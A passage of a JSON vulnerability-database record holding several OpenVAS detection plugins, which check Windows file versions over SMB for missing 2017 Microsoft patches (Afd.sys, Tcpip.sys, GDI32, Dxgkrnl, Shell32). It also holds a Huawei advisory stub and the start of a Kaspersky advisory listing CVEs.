script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nif(!asVer = fetch_file_version(sysPath:sysPath, file_name:\"\\drivers\\Afd.sys\")){\n exit(0);\n}\n\nif(version_is_less(version:asVer, test_version:\"6.0.6002.19762\"))\n{\n Vulnerable_range = \"Less than 6.0.6002.19762\";\n VULN = TRUE ;\n}\n\nelse if(version_in_range(version:asVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24086\"))\n{\n Vulnerable_range = \"6.0.6002.23000 - 6.0.6002.24086\";\n VULN = TRUE ;\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\Afd.sys\" + '\\n' +\n 'File version: ' + asVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-08T23:25:41", "description": "This host is missing an important security\n update according to Microsoft KB4018885.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows 'Tcpip.sys' Information Disclosure Vulnerability (KB4018885)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0175"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811030", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811030", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows 'Tcpip.sys' Information Disclosure Vulnerability (KB4018885)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811030\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0175\");\n script_bugtraq_id(98110);\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 11:16:48 +0530 (Wed, 10 May 2017)\");\n script_name(\"Microsoft Windows 'Tcpip.sys' Information Disclosure Vulnerability (KB4018885)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4018885.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to the windows kernel\n improperly handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to gain access to sensitive information which can aid in further compromise of\n the user's system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2 and prior.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4018885\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0175\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nwinVer = fetch_file_version(sysPath:sysPath, file_name:\"drivers\\tcpip.sys\");\nif(!winVer){\n exit(0);\n}\n\nif(version_is_less(version:winVer, test_version:\"6.0.6002.19763\"))\n{\n Vulnerable_range = \"Less than 6.0.6002.19763\";\n VULN = TRUE ;\n}\n\nelse if(version_in_range(version:winVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24086\"))\n{\n Vulnerable_range = \"6.0.6002.23000 - 6.0.6002.24086\";\n VULN = TRUE ;\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\drivers\\tcpip.sys\" + '\\n' +\n 'File version: ' + winVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-08T23:20:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0190"], "description": "This host is missing an important security\n update according to Microsoft KB4019206.", "modified": "2020-06-04T00:00:00", "published": "2017-05-10T00:00:00", "id": "OPENVAS:1361412562310811027", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811027", "type": "openvas", "title": "Microsoft Windows 'GDI32.DLL' Information Disclosure Vulnerability (KB4019206)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows 'GDI32.DLL' Information Disclosure Vulnerability (KB4019206)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811027\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0190\");\n script_bugtraq_id(98297);\n script_tag(name:\"cvss_base\", value:\"2.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 09:58:52 +0530 (Wed, 10 May 2017)\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_name(\"Microsoft Windows 'GDI32.DLL' Information Disclosure Vulnerability (KB4019206)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4019206.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to error in the way that\n the Windows Graphics Device Interface (GDI) handles objects in memory.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to retrieve information from a targeted system. By itself, the information\n disclosure does not allow arbitrary code execution. However, it could allow\n arbitrary code to be run if the attacker uses it in combination with another\n vulnerability.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4019206\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0190\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\ngdiVer = fetch_file_version(sysPath:sysPath, file_name:\"Gdi32.dll\");\nif(!gdiVer){\n exit(0);\n}\n\nif(version_is_less(version:gdiVer, test_version:\"6.0.6002.19765\"))\n{\n Vulnerable_range = \"Less than 6.0.6002.19765\";\n VULN = TRUE ;\n}\n\nelse if(version_in_range(version:gdiVer, test_version:\"6.0.6002.23000\", test_version2:\"6.0.6002.24088\"))\n{\n Vulnerable_range = \"6.0.6002.23000 - 6.0.6002.24088\";\n VULN = TRUE ;\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\Gdi32.dll\" + '\\n' +\n 'File version: ' + gdiVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-08T23:21:03", "description": "This host is missing an important security\n update according to Microsoft KB4019149.", "cvss3": {}, "published": "2017-05-10T00:00:00", "type": "openvas", "title": "Microsoft Windows 'Dxgkrnl.sys' Elevation of Privilege Vulnerability (KB4019149)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0077"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811029", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811029", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows 'Dxgkrnl.sys' Elevation of Privilege Vulnerability (KB4019149)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811029\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-0077\");\n script_bugtraq_id(98114);\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-10 10:56:24 +0530 (Wed, 10 May 2017)\");\n script_name(\"Microsoft Windows 'Dxgkrnl.sys' Elevation of Privilege Vulnerability (KB4019149)\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4019149.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists due to error in the way\n Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) handles certain calls\n and escapes to preclude improper memory mapping and prevent unintended elevation\n from user-mode.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to take control over the affected system and run processes in an elevated context.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows Server 2008 x32/x64 Edition Service Pack 2 and prior.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4019149\");\n script_xref(name:\"URL\", value:\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0077\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win2008:3, win2008x64:3) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nwinVer = fetch_file_version(sysPath:sysPath, file_name:\"Dxgkrnl.sys\");\nif(!winVer){\n exit(0);\n}\n\nif(version_is_less(version:winVer, test_version:\"7.0.6002.19765\"))\n{\n Vulnerable_range = \"Less than 7.0.6002.19765\";\n VULN = TRUE ;\n}\n\nelse if(version_in_range(version:winVer, test_version:\"6.0.6002.23000\", test_version2:\"7.0.6002.24088\"))\n{\n Vulnerable_range = \"6.0.6002.23000 - 7.0.6002.24088\";\n VULN = TRUE ;\n}\n\nif(VULN)\n{\n report = 'File checked: ' + sysPath + \"\\Dxgkrnl.sys\" + '\\n' +\n 'File version: ' + winVer + '\\n' +\n 'Vulnerable range: ' + Vulnerable_range + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-08T23:18:55", "description": "This host is missing a critical security\n update according to Microsoft security update KB4022839.", "cvss3": {}, "published": "2017-06-16T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple RCE Vulnerabilities (KB4022839)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8464", "CVE-2017-8543", "CVE-2017-8552"], "modified": "2020-06-04T00:00:00", "id": "OPENVAS:1361412562310811208", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310811208", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Multiple RCE Vulnerabilities (KB4022839)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811208\");\n script_version(\"2020-06-04T12:11:49+0000\");\n script_cve_id(\"CVE-2017-8464\", \"CVE-2017-8543\", \"CVE-2017-8552\");\n script_bugtraq_id(98818, 98824, 99035);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 12:11:49 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-06-16 16:41:25 +0530 (Fri, 16 Jun 2017)\");\n script_name(\"Microsoft Windows Multiple RCE Vulnerabilities (KB4022839)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft security update KB4022839.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws are due to,\n\n - An error exists in 'Win32k' when the Windows kernel-mode driver fails to\n properly handle objects in memory.\n\n - An error in the Windows Search which fails to handles objects in memory.\n\n - An error in .LNK file due to processing of shortcut LNK references.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in kernel mode allowing attacker to install programs.\n View, change, or delete data, or create new accounts with full user rights.Also\n an attacker who successfully exploited this vulnerability could run processes\n in an elevated context.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Windows 8 x86/x64.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-ph/help/4022839\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win8:1, win8x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nwinVer = fetch_file_version(sysPath:sysPath, file_name:\"Shell32.dll\");\nif(!winVer){\n exit(0);\n}\n\nif(version_is_less(version:winVer, test_version:\"6.2.9200.22164\"))\n{\n report = 'File checked: ' + sysPath + \"\\Shell32.dll\" + '\\n' +\n 'File version: ' + winVer + '\\n' +\n 'Vulnerable range: ' + 'Less than 6.2.9200.22164' + '\\n' ;\n security_message(data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-09T17:47:14", "description": "Microsoft had released a Security Advisory 4025685 on June 14 to fix multiple critical security vulnerabilities in such systems as Microsoft Windows XP, Windows Server 2003, Windows VISTA, and Windows 8.", "cvss3": {}, "published": "2020-06-05T00:00:00", "type": "openvas", "title": "Huawei Data Communication: Multiple Vulnerabilities Released on Microsoft security advisory 4025685 (huawei-sa-20170909-01-windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-8461", "CVE-2017-8464", "CVE-2017-8543", "CVE-2017-8487", "CVE-2017-8552", "CVE-2017-0176"], "modified": "2020-06-06T00:00:00", "id": "OPENVAS:1361412562310108777", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108777", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108777\");\n script_version(\"2020-06-06T12:09:29+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-06 12:09:29 +0000 (Sat, 06 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-06-05 08:17:40 +0000 (Fri, 05 Jun 2020)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_cve_id(\"CVE-2017-8543\", \"CVE-2017-8464\", \"CVE-2017-8461\", \"CVE-2017-8487\", \"CVE-2017-8552\", \"CVE-2017-0176\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"Huawei Data Communication: Multiple Vulnerabilities Released on Microsoft security advisory 4025685 (huawei-sa-20170909-01-windows)\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei\");\n script_dependencies(\"gb_huawei_vrp_network_device_consolidation.nasl\");\n script_mandatory_keys(\"huawei/vrp/detected\");\n\n script_tag(name:\"summary\", value:\"Microsoft had released a Security Advisory 4025685 on June 14 to fix multiple critical security vulnerabilities in such systems as Microsoft Windows XP, Windows Server 2003, Windows VISTA, and Windows 8.\");\n\n script_tag(name:\"insight\", value:\"Microsoft had released a Security Advisory 4025685 on June 14 to fix multiple critical security vulnerabilities in such systems as Microsoft Windows XP, Windows Server 2003, Windows VISTA, and Windows 8. Attackers can exploit these vulnerabilities to implement remote code execution or privilege elevation. (Vulnerability ID: HWPSIRT-2017-06114,HWPSIRT-2017-06115,HWPSIRT-2017-06131,HWPSIRT-2017-06133,HWPSIRT-2017-06153 and HWPSIRT-2017-06154)The six vulnerabilities have been assigned six Common Vulnerabilities and Exposures (CVE) IDs: CVE-2017-0176, CVE-2017-8461, CVE-2017-8464, CVE-2017-8487, CVE-2017-8543 and CVE-2017-8552.Huawei has released software updates to fix these vulnerabilities. This advisory is available in the linked references.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit these vulnerabilities to implement remote code execution or privilege elevation.\");\n\n script_tag(name:\"affected\", value:\"AnyOffice versions V200R002C10\n\nN2000 Appliance versions V100R001C00\n\nOceanStor 18500 versions V100R001C00 V100R001C10 V100R001C20 V100R001C30 V100R001C99\n\nOceanStor 18800 versions V100R001C00 V100R001C10 V100R001C20 V100R001C30 V100R001C99\n\nOceanStor Backup Software versions V100R001C00\n\nSMC2.0 versions V100R003C10 V100R005C00 V500R002C00 V600R006C00\n\nSecospace AntiDDoS8000 versions V100R001C00\n\nSecospace AntiDDoS8160 versions V100R001C00SPC300\n\nUC Audio Recorder versions V100R001C01\n\nUMA versions V300R001C00\n\neLog versions V200R003C10\n\neSpace ECS versions V200R003C00\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_xref(name:\"URL\", value:\"https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170909-01-windows-en\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\n# nb: Unknown device (no VRP), no public vendor advisory or general inconsistent / broken data\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2021-08-18T11:18:04", "description": "### *Detect date*:\n05/09/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to obtain sensitive information, cause denial of service, execute arbitrary code, gain privileges.\n\n### *Affected products*:\nWindows 7 for 32-bit Systems Service Pack 1 \nWindows 10 Version 1511 for 32-bit Systems \nWindows 10 Version 1703 for x64-based Systems \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for Itanium-Based Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 1511 for x64-based Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2012 \nWindows RT 8.1 \nWindows 10 Version 1607 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows Server 2012 (Server Core installation) \nWindows Server 2016 \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2012 R2 \nWindows 10 for x64-based Systems \nWindows Server 2008 for x64-based Systems Service Pack 2 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows 10 Version 1703 for 32-bit Systems \nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 for Itanium-Based Systems Service Pack 2 \nWindows 8.1 for x64-based systems \nWindows Server 2016 (Server Core installation)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-0280](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0280>) \n[CVE-2017-0274](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0274>) \n[CVE-2017-0272](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0272>) \n[CVE-2017-0279](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0279>) \n[CVE-2017-0273](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0273>) \n[CVE-2017-0276](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0276>) \n[CVE-2017-0278](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0278>) \n[CVE-2017-0213](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0213>) \n[CVE-2017-0212](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0212>) \n[CVE-2017-0270](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0270>) \n[CVE-2017-0245](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0245>) \n[CVE-2017-0171](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0171>) \n[CVE-2017-0259](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0259>) \n[CVE-2017-0246](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0246>) \n[CVE-2017-0277](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0277>) \n[CVE-2017-0258](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0258>) \n[CVE-2017-0269](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0269>) \n[CVE-2017-0267](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0267>) \n[CVE-2017-0077](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0077>) \n[CVE-2017-0190](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0190>) \n[CVE-2017-0275](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0275>) \n[CVE-2017-0271](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0271>) \n[CVE-2017-0214](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0214>) \n[CVE-2017-0263](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0263>) \n[CVE-2017-0268](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0268>) \n[CVE-2017-0220](<https://portal.msrc.microsoft.com/api/security-guidance/en-US/CVE/CVE-2017-0220>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows Server 2012](<https://threats.kaspersky.com/en/product/Microsoft-Windows-Server-2012/>)\n\n### *CVE-IDS*:\n[CVE-2017-0280](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0280>)7.1High \n[CVE-2017-0279](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0279>)6.8High \n[CVE-2017-0278](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0278>)6.8High \n[CVE-2017-0277](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0277>)6.8High \n[CVE-2017-0276](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0276>)4.3Warning \n[CVE-2017-0275](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0275>)4.3Warning 